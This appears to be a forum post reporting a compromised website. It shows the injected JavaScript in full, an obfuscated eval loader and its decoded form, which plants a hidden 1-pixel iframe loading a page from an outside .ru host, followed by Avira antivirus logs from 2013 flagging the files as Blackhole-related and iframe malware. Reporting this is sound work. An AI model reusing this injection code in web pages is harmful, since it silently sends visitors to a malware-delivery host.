- /*ded509*/
- asq = function() {
- return n[i];
- };
- ww = window;
- ss = String.fromCharCode;
- try {
- document.body = ~1
- } catch (dgsgsdg) {
- zz = 12 * 2 + 1 + 1;
- whwej = 12;
- } {
- try {
- whwej = ~2;
- } catch (agdsg) {
- whwej = 0;
- }
- if (whwej) {
- try {
- document.body++;
- } catch (bawetawe) {
- if (ww.document) {
- n = "0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6e,0x71,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x75,0x76,0x6c,0x6d,0x6a,0x64,0x6a,0x75,0x2f,0x73,0x76,0x30,0x64,0x70,0x76,0x6f,0x75,0x32,0x35,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x66,0x6e,0x71,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x66,0x6e,0x71,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x66,0x6e,0x71,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x66,0x6e,0x71,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
- h = 2;
- s = "";
- for (i = 0; i - 468 != 0; i++) {
- k = i;
- s = s.concat(ss(eval(asq()) - 1));
- }
- z = s;
- eval("" + s);
- }
- }
- }
- } /*/ded509*/
复制代码
- (function() {
- var qmfm = document.createElement('iframe');
- qmfm.src = 'http://tuklicit.ru/count14.php';
- qmfm.style.position = 'absolute';
- qmfm.style.border = '0';
- qmfm.style.height = '1px';
- qmfm.style.width = '1px';
- qmfm.style.left = '1px';
- qmfm.style.top = '1px';
- if (!document.getElementById('qmfm')) {
- document.write('<div id=\'qmfm\'></div>');
- document.getElementById('qmfm').appendChild(qmfm);
- }
- })();
复制代码
Avira
2013/8/10 上午 10:51 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\Q4CFJPIR\AC_RunActiveContent[1].js'
包含病毒或有害的程式 'JS/BlacoleRef.CL.142' [virus]
已採取動作:
檔案會移動至 '579c041d.qua' 名稱底下的隔離區目錄。.
2013/8/10 上午 10:51 [System Scanner] 掃描
掃描結束 [已完成全部的掃描。]。
檔案數: 830
目錄數: 0
惡意程式碼數: 1
警告數: 0
2013/8/10 上午 10:51 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\K1SHW7HQ\grupo-sltc_com[1].htm'
包含病毒或有害的程式 'JS/iFrame.dbr' [virus]
已採取動作:
檔案會移動至 '559a067b.qua' 名稱底下的隔離區目錄。.
2013/8/10 上午 10:51 [System Scanner] 掃描
掃描結束 [已完成全部的掃描。]。
檔案數: 830
目錄數: 0
惡意程式碼數: 1
警告數: 0
2013/8/10 上午 10:51 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\Q4CFJPIR\AC_RunActiveContent[1].js 中
偵測到病毒或有害的程式 'JS/BlacoleRef.CL.142 [virus]'
執行的動作:傳輸至掃描程式
2013/8/10 上午 10:51 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\Q4CFJPIR\AC_RunActiveContent[1].js 中
偵測到病毒或有害的程式 'JS/BlacoleRef.CL.142 [virus]'
執行的動作:拒絕存取
2013/8/10 上午 10:51 [Web Protection] 發現惡意程式碼
從 URL "http://www.grupo-sltc.com/AC_RunActiveContent.js" 存取資料時,
發現病毒或有害的程式 'JS/BlacoleRef.CL.142' [virus]。
已採取動作:已略過
2013/8/10 上午 10:51 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\K1SHW7HQ\grupo-sltc_com[1].htm 中
偵測到病毒或有害的程式 'JS/iFrame.dbr [virus]'
執行的動作:傳輸至掃描程式
2013/8/10 上午 10:51 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\K1SHW7HQ\grupo-sltc_com[1].htm 中
偵測到病毒或有害的程式 'JS/iFrame.dbr [virus]'
執行的動作:拒絕存取
2013/8/10 上午 10:51 [Web Protection] 發現惡意程式碼
從 URL "http://www.grupo-sltc.com/" 存取資料時,
發現病毒或有害的程式 'JS/iFrame.dbr' [virus]。
已採取動作:已略過
|